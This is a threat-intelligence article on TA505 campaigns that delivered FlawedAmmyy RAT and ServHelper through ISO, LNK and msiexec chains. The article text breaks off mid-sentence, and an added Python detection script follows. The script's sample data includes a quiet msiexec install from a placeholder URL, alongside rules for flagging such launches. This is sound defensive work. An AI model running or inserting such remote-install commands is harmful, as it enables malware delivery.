TA505 APT Hackers Group Drop ServHelper and FlawedAmmyy
TA505 continues to evolve by making small changes to its techniques, its target countries and the combination of techniques used in each campaign. The group's campaigns observed in April, June and July all delivered FlawedAmmyy RAT or ServHelper variants as payloads. According to a Trend Micro report, the group is now targeting new countries such as Turkey, Serbia, Romania, Korea, Canada, the Czech Republic and Hungary.

TA505 entry methods

The new campaign targets banks in Turkey and Serbia with an .ISO file as an email attachment; this method is not new for TA505. The group uses the following entry points:

- ISO image attachments
- .NET downloader
- New style of macro delivery
- Newer version of ServHelper
- .DLL variant of the FlawedAmmyy downloader

The attack starts with an email carrying an ISO image that contains an .LNK file, which in turn uses msiexec, the Windows installer, to install the file do...
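The chain described above (a user mounts the ISO, opens the .LNK, and msiexec is launched to fetch and install the payload) leaves a recognisable trace in process-creation telemetry. The following is an added triage example, not code from the article or from Trend Micro: it runs over constructed Sysmon-style process-creation records (parent image, image, command line, current directory) and flags msiexec.exe invocations that look like the ISO/LNK delivery. The field names, the sample events, the quiet-install flag list and the "non-system volume" heuristic (a mounted ISO normally appears as a drive letter other than C:) are all assumptions made for this example.

```python
import re
from dataclasses import dataclass

# Assumed event shape, modelled on Sysmon Event ID 1 fields (not the page's data).
@dataclass
class ProcessEvent:
    parent_image: str
    image: str
    command_line: str
    current_directory: str

# msiexec can install straight from a URL; an attacker-hosted .msi is the
# usual way an LNK-triggered msiexec pulls its payload.
URL_RE = re.compile(r"https?://", re.IGNORECASE)

# Flags that suppress the installer UI (assumed list for this example).
QUIET_FLAGS = {"/q", "/qn", "/qb", "/quiet", "/passive"}

# Parents a user-driven launch (double-clicked LNK, shell one-liner) would have.
USER_SHELLS = ("\\explorer.exe", "\\cmd.exe", "\\powershell.exe")


def msiexec_suspicion(ev: ProcessEvent) -> list[str]:
    """Return the reasons an msiexec launch looks like the ISO/LNK chain.

    An empty list means the event is not msiexec or shows none of the traits.
    """
    if not ev.image.lower().endswith("\\msiexec.exe"):
        return []

    reasons = []
    cmd = ev.command_line

    if URL_RE.search(cmd):
        reasons.append("remote package")

    tokens = cmd.lower().split()
    if any(t in QUIET_FLAGS for t in tokens):
        reasons.append("quiet install")

    # Heuristic (assumption): a user-shell parent with a working directory on a
    # volume other than C: is consistent with a LNK launched from a mounted ISO.
    if (ev.parent_image.lower().endswith(USER_SHELLS)
            and not ev.current_directory.lower().startswith("c:\\")):
        reasons.append("launched from non-system volume")

    return reasons


def triage(events: list[ProcessEvent]) -> list[tuple[int, list[str]]]:
    """Index every event with at least one suspicion reason."""
    hits = []
    for idx, ev in enumerate(events):
        reasons = msiexec_suspicion(ev)
        if reasons:
            hits.append((idx, reasons))
    return hits


# Constructed sample events (not real telemetry). Only the first matches the chain.
SAMPLE_EVENTS = [
    ProcessEvent("C:\\Windows\\explorer.exe",
                 "C:\\Windows\\System32\\msiexec.exe",
                 "msiexec.exe /i http://example.invalid/update.msi /q",
                 "E:\\"),
    # Legitimate Windows Installer service instance.
    ProcessEvent("C:\\Windows\\System32\\services.exe",
                 "C:\\Windows\\System32\\msiexec.exe",
                 "C:\\Windows\\system32\\msiexec.exe /V",
                 "C:\\Windows\\system32\\"),
    # User installing a local package from their Downloads folder.
    ProcessEvent("C:\\Windows\\explorer.exe",
                 "C:\\Windows\\System32\\msiexec.exe",
                 "msiexec.exe /i C:\\Users\\alice\\Downloads\\tool.msi",
                 "C:\\Users\\alice\\Downloads\\"),
    ProcessEvent("C:\\Windows\\explorer.exe",
                 "C:\\Windows\\notepad.exe",
                 "notepad.exe",
                 "C:\\Users\\alice\\"),
]

if __name__ == "__main__":
    for idx, reasons in triage(SAMPLE_EVENTS):
        print(f"event {idx}: {SAMPLE_EVENTS[idx].command_line!r} -> {', '.join(reasons)}")
```

Each reason alone is weak (quiet installs and URL-based installs both occur legitimately), so in practice the three traits together, or a remote package combined with a user-shell parent, is the signal worth alerting on; the function returns the reasons rather than a verdict so the threshold can be set per environment.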